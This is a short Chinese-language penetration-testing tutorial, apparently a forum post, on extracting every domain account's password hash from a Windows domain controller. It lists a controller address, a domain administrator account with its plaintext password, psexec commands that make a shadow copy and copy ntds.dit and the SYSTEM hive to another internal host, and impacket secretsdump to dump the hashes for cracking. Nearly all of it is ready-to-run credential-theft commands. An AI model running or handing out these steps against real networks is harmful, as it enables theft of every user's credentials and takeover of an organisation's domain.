叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,导出DC中所有内网主机的密码并破解
0x0 环境
DC:172.31.20.30 domain用户:pentest\administrator 密码:UFhae&pwL%F
内网主机A(win 2012):172.31.21.166
psexec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump:https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 导出加密后的ntds.dit
使用psexec 获取信息:
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #获取信息且输出到out.txt,成功
使用psexec 导出加密后的ntds.dit:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"
使用psexec 导出加密后的system:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\"
我们有了ntds.dit和system就可以解密了
0x2 解密ntds.dit和system
工具是:impacket里的secretsdump
我用的kali,这个工具windows也是支持的。。。。-------&bugfor首发:菊花槿&
kali先快速安装:
pip install .
然后把ntds.dit和system放到secretsdump.py一起执行:
secretsdump.py -ntds ntds.dit -system SYSTEM local
扫描后拿去解密hash即可: